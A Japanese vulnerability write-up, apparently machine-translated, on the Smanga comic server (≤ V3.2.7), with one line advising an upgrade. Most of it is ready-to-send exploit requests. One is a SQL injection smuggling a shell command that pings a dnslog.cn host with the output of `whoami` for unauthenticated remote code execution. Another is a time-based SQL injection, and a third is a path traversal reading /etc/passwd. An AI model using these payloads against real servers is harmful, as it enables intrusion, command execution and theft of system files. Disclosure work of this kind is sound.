記事ディレクトリ
序文
Smanga には、不正なリモート コード実行の脆弱性があり、攻撃者がターゲット ホスト上で任意のコマンドを実行し、サーバーの権限を取得することを可能にします。
声明
この記事に記載されている関連テクノロジーを違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身の責任となります。記事の著者は無関係です。この記事は教育のみを目的としています。
1. 製品紹介
設定は不要で、docker に直接インストールされるコミックストリーミングメディア読み取りツールです。emby plex からインスピレーションを得て、コミック読書のニーズを解決するために開発されたコミック リーダーです。Windows 環境に smanga インストール環境パネルを展開するには、まず小さなレザー パネルをインストールし、smanga プロジェクトをダウンロードし、データベースをインポートし、smanga にログインし、smanga を Windows に展開します。
1. 脆弱性の説明
/php/manga/delete.php インターフェースには不正なリモートコード実行の脆弱性があり、攻撃者はターゲットホスト上で任意のコマンドを実行し、サーバー権限を取得する可能性があります。
2. 脆弱性レベル
- リスクが高い
3. 影響範囲
- Sマンガ ≤ V3.2.7
4. 脆弱性の再発
環境構築についてはこちらをご参照ください:https://www.bilibili.com/read/cv21910784/
システムインターフェイスは次のとおりです
EXP:
POST /php/manga/delete.php HTTP/1.1
Host: XX.XX.XX.XX:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360
mangaId=1+union+select+*+from+%28select+1%29a+join+%28select+2%29b+join+%28select+3%29c+join+%28select+4%29d+join+%28select+%27%5C%22%3Bping+-c+3+%60whoami%60.zm16pf.dnslog.cn%3B%5C%22%27%29e+join+%28select+6%29f+join+%28select+7%29g+join+%28select+8%29h+join+%28select+9%29i+join+%28select+10%29j+join+%28select+11%29k+join+%28select+12%29l%3B&deleteFile=true
5. 修理のご提案
公式パッチがリリースされましたので、アップグレードしてください。
6. 追加の脆弱性
脆弱性 1. SQL インジェクション
脆弱性の説明:
/php/history/add.phpSQL インジェクションの脆弱性があり、機密情報が取得される可能性があります。
影響を受けるバージョン
- smanga ≤ V3.2.7
エクスプロイト
POC:
POST /php/history/add.php HTTP/1.1
Host: XX.XX.XX.XX:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: thinkphp_show_page_trace=0|0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=if(now()=sysdate()%2Csleep(5)%2C0)×tamp=12123123&userId=1
脆弱性2. 任意のファイルを読み取られる
脆弱性説明
/php/get-file-flow.phpインターフェイスのファイル パラメータがフィルタリングされていないため、パス トラバーサルが発生し、任意のファイルを読み取る脆弱性が発生し、不正な攻撃者が設定ファイルを読み取る可能性があります。
影響を受けるバージョン
- smanga ≤ V3.2.7
POCを悪用します
:
POST /php/get-file-flow.php HTTP/1.1
Host: XX.XX.XX.XX:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: thinkphp_show_page_trace=0|0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
file=../../../../../../../../etc/passwd
